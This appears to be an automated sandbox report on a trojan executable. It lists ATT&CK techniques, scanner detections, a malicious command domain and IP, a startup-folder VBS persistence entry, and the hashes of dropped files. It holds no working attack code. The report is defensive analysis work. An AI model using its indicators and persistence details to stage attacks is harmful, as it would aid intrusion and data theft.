Gather Victim Identity Information	111 Scripting	2 Valid Accounts	221 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	21 Obfuscated Files or Information	1 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Software Packing	NTDS	138 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	751 Security Software Discovery	SSH	3 Clipboard Data	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	231 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	231 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
28uMwHvbTD.exe	82%	Virustotal		Browse
28uMwHvbTD.exe	71%	ReversingLabs	Win32.Trojan.AutoitInject
28uMwHvbTD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\roundup\phagocytose.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\roundup\phagocytose.exe	71%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label	Link
http://antoniomayol.com	0%	Avira URL Cloud	safe
http://ftp.antoniomayol.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
antoniomayol.com	162.241.62.63	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
ip-api.com	208.95.112.1	true	false	high
ftp.antoniomayol.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://antoniomayol.com	RegSvcs.exe, 00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.antoniomayol.com	RegSvcs.exe, 00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.dyn.com/	phagocytose.exe, 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, phagocytose.exe, 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.1585828509.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.00000000023CC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	RegSvcs.exe, 00000003.00000002.1585828509.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.00000000023CC000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.241.62.63	antoniomayol.com	United States		46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588176
Start date and time:	2025-01-10 22:18:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	28uMwHvbTD.exe renamed because original name is a hash value
Original Sample Name:	97a8bf73809611ee4048adc2714685bd29bba3e677f5589b1053e30e0d98cf53.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 58 Number of non-executed functions: 285
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:19:21	API Interceptor	1292836x Sleep call for process: RegSvcs.exe modified
21:19:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	e4Iw3lwFJ5.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	uOCavrYu1y.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	XoRPyi5s1i.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	NX8j2O83Wu.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	7569qiv4L2.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	hCkkM0lH0P.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	sDflTDPSLw.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	2HCwqwLg1G.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	CdbVaYf8jC.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	H9YFiQB7o3.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
162.241.62.63	Order 122001-220 guanzo.exe	Get hash	malicious	FormBook	Browse	www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	https://services221.com/mm/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	8qQwTWK3jx.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	1018617432866721695.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	hm8dCK5P5A.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	13.107.246.45
	247714231173424547.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	984279432356016169.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
ip-api.com	e4Iw3lwFJ5.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	uOCavrYu1y.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	XoRPyi5s1i.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NX8j2O83Wu.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	7569qiv4L2.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	hCkkM0lH0P.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	sDflTDPSLw.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2HCwqwLg1G.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	CdbVaYf8jC.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	H9YFiQB7o3.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	162.241.149.91
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	108.179.241.236
	e4Iw3lwFJ5.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	https://probashkontho.com/work/Organization/privacy/index_.html	Get hash	malicious	Unknown	Browse	192.185.57.31
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	192.254.186.165
	secured File__esperion.com.html	Get hash	malicious	Phisher	Browse	162.241.149.91
	secured File__esperion.com.html	Get hash	malicious	Phisher	Browse	162.241.149.91
	XoRPyi5s1i.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
	NX8j2O83Wu.exe	Get hash	malicious	AgentTesla	Browse	162.241.62.63
TUT-ASUS	e4Iw3lwFJ5.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	uOCavrYu1y.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	XoRPyi5s1i.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NX8j2O83Wu.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	7569qiv4L2.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	hCkkM0lH0P.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	sDflTDPSLw.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2HCwqwLg1G.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	CdbVaYf8jC.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	H9YFiQB7o3.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

Process:	C:\Users\user\Desktop\28uMwHvbTD.exe
File Type:	data
Category:	dropped
Size (bytes):	157360
Entropy (8bit):	7.882564349942999
Encrypted:	false
SSDEEP:	3072:qu5UyHNzmDf6y+CeCMz73gsjAX7f40q9FA5pQfNs/Bsc8ugepPEtasP3:qGjHNzYiyZeCMz73gssLg0UIQf+UgPEF
MD5:	27D93E08E5C8A10954BBF92645073DCD
SHA1:	D3DE8A548CF2FBA7780F48DF9502DDF198622A4F
SHA-256:	730BBFF189885848B88D634B42F267CC7B07A5F4202240824973CCDB3312AFF5
SHA-512:	8554BCC22FEE7679649ABE0F2EA6BD18845B7FD739AE0CA571466F32FB6BA9F3B4D1440146EEDFC1F2F2A8FED8E9AB5652E652796C6CBFA5BEFE9BDE0707BFE3
Malicious:	false
Reputation:	low
Preview:	EA06.....X..y..G.RT>...H..h.Z.b.U..).Z..qG.... ..a8..(......gn.8S..l..X...k.V....$..,.._....$.M<.Q#.9m.O2..&3...7......f{B...3..Q.J.Z.2.@.`...R.)..H..h.Z.@....\.7..F.......Q...j.U..Fff.Q..V.G..Tb.T.t..E.o ..hT9.......N..T.<4...T............x.....}.....C...v.t.Uc....S&.....<.U........&@....U....<....@?3>..<t@....0......[..)`..F.A....Y..G..........4...i.......yy.....9...t...`......}.G....(.........J...[.yh.hD..Z.Nk..5..\..uy...[S.B.J.3..O.....{...h5.WC....'..%>y..^....}.....9....J...GO.+..T.2!..bb...s..Q,..ZC..N...I8.."..5F.=.~.Z...C...<..gK.(.@.......M.>......Jc.....&..$........p.P....pJ@8...~.8D.[1G....P..T.8_..3.M.....]1..@F+....Mx.n./ub.z>..7.c..\0..]s...C.Vn.^{..E..-gBm....z.jsE..4.5N.0.W.5jm.....=.i..B.S.........2qM]....t.\|y&k...R.S...k..~..A...w...Vs.....4.#[C....~..k..M&...C:..TJ..c'.F..KE.q5.O.p1U.U.3..<.q.R.U...b..3Z.sW@..).yU....Fh.*e..@.Mb.Z<.....UJE~Q[..&Vz...X...{...A.D+.Z..kH..brj-2...X.....MH..m.....U..z.I....w4;.b.B.ThVp.B....

C:\Users\user\AppData\Local\Temp\aut73C4.tmp

Download File

Process:	C:\Users\user\AppData\Local\roundup\phagocytose.exe
File Type:	data
Category:	dropped
Size (bytes):	157360
Entropy (8bit):	7.882564349942999
Encrypted:	false
SSDEEP:	3072:qu5UyHNzmDf6y+CeCMz73gsjAX7f40q9FA5pQfNs/Bsc8ugepPEtasP3:qGjHNzYiyZeCMz73gssLg0UIQf+UgPEF
MD5:	27D93E08E5C8A10954BBF92645073DCD
SHA1:	D3DE8A548CF2FBA7780F48DF9502DDF198622A4F
SHA-256:	730BBFF189885848B88D634B42F267CC7B07A5F4202240824973CCDB3312AFF5
SHA-512:	8554BCC22FEE7679649ABE0F2EA6BD18845B7FD739AE0CA571466F32FB6BA9F3B4D1440146EEDFC1F2F2A8FED8E9AB5652E652796C6CBFA5BEFE9BDE0707BFE3
Malicious:	false
Reputation:	low
Preview:	EA06.....X..y..G.RT>...H..h.Z.b.U..).Z..qG.... ..a8..(......gn.8S..l..X...k.V....$..,.._....$.M<.Q#.9m.O2..&3...7......f{B...3..Q.J.Z.2.@.`...R.)..H..h.Z.@....\.7..F.......Q...j.U..Fff.Q..V.G..Tb.T.t..E.o ..hT9.......N..T.<4...T............x.....}.....C...v.t.Uc....S&.....<.U........&@....U....<....@?3>..<t@....0......[..)`..F.A....Y..G..........4...i.......yy.....9...t...`......}.G....(.........J...[.yh.hD..Z.Nk..5..\..uy...[S.B.J.3..O.....{...h5.WC....'..%>y..^....}.....9....J...GO.+..T.2!..bb...s..Q,..ZC..N...I8.."..5F.=.~.Z...C...<..gK.(.@.......M.>......Jc.....&..$........p.P....pJ@8...~.8D.[1G....P..T.8_..3.M.....]1..@F+....Mx.n./ub.z>..7.c..\0..]s...C.Vn.^{..E..-gBm....z.jsE..4.5N.0.W.5jm.....=.i..B.S.........2qM]....t.\|y&k...R.S...k..~..A...w...Vs.....4.#[C....~..k..M&...C:..TJ..c'.F..KE.q5.O.p1U.U.3..<.q.R.U...b..3Z.sW@..).yU....Fh.*e..@.Mb.Z<.....UJE~Q[..&Vz...X...{...A.D+.Z..kH..brj-2...X.....MH..m.....U..z.I....w4;.b.B.ThVp.B....

C:\Users\user\AppData\Local\Temp\autAEE9.tmp

Download File

Process:	C:\Users\user\AppData\Local\roundup\phagocytose.exe
File Type:	data
Category:	dropped
Size (bytes):	157360
Entropy (8bit):	7.882564349942999
Encrypted:	false
SSDEEP:	3072:qu5UyHNzmDf6y+CeCMz73gsjAX7f40q9FA5pQfNs/Bsc8ugepPEtasP3:qGjHNzYiyZeCMz73gssLg0UIQf+UgPEF
MD5:	27D93E08E5C8A10954BBF92645073DCD
SHA1:	D3DE8A548CF2FBA7780F48DF9502DDF198622A4F
SHA-256:	730BBFF189885848B88D634B42F267CC7B07A5F4202240824973CCDB3312AFF5
SHA-512:	8554BCC22FEE7679649ABE0F2EA6BD18845B7FD739AE0CA571466F32FB6BA9F3B4D1440146EEDFC1F2F2A8FED8E9AB5652E652796C6CBFA5BEFE9BDE0707BFE3
Malicious:	false
Reputation:	low
Preview:	EA06.....X..y..G.RT>...H..h.Z.b.U..).Z..qG.... ..a8..(......gn.8S..l..X...k.V....$..,.._....$.M<.Q#.9m.O2..&3...7......f{B...3..Q.J.Z.2.@.`...R.)..H..h.Z.@....\.7..F.......Q...j.U..Fff.Q..V.G..Tb.T.t..E.o ..hT9.......N..T.<4...T............x.....}.....C...v.t.Uc....S&.....<.U........&@....U....<....@?3>..<t@....0......[..)`..F.A....Y..G..........4...i.......yy.....9...t...`......}.G....(.........J...[.yh.hD..Z.Nk..5..\..uy...[S.B.J.3..O.....{...h5.WC....'..%>y..^....}.....9....J...GO.+..T.2!..bb...s..Q,..ZC..N...I8.."..5F.=.~.Z...C...<..gK.(.@.......M.>......Jc.....&..$........p.P....pJ@8...~.8D.[1G....P..T.8_..3.M.....]1..@F+....Mx.n./ub.z>..7.c..\0..]s...C.Vn.^{..E..-gBm....z.jsE..4.5N.0.W.5jm.....=.i..B.S.........2qM]....t.\|y&k...R.S...k..~..A...w...Vs.....4.#[C....~..k..M&...C:..TJ..c'.F..KE.q5.O.p1U.U.3..<.q.R.U...b..3Z.sW@..).yU....Fh.*e..@.Mb.Z<.....UJE~Q[..&Vz...X...{...A.D+.Z..kH..brj-2...X.....MH..m.....U..z.I....w4;.b.B.ThVp.B....

C:\Users\user\AppData\Local\Temp\croc

Download File

Process:	C:\Users\user\Desktop\28uMwHvbTD.exe
File Type:	data
Category:	dropped
Size (bytes):	245248
Entropy (8bit):	6.627600273799502
Encrypted:	false
SSDEEP:	6144:TgUD2b+EkoQMw8hMpWUosCBgDMbTfB9dOHCrcX6rw5I4o9:ptKScngXI39
MD5:	19705215F3410D81AD6872443939935C
SHA1:	ECE56B33C477BE2D5B7D5517F37A4546CE6EF8BB
SHA-256:	CBED1CA40331D9331056AF6B2C601ACBE9E50E4E9DF44E371E192CDBA2DAECC1
SHA-512:	C59550986AA43A8F7A6319033A5C7B558B616F4A508860A522EA3E0E1B86032A947B930A10FD80720AE2074300CC926E964204C7EE87617E0DAF70FD323B81D5
Malicious:	false
Reputation:	low
